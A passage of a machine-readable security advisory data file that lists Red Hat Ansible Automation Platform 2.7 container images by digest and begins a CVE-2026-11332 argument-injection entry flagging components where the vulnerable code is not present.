"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Tommaso Bona"
]
}
],
"cve": "CVE-2026-11332",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
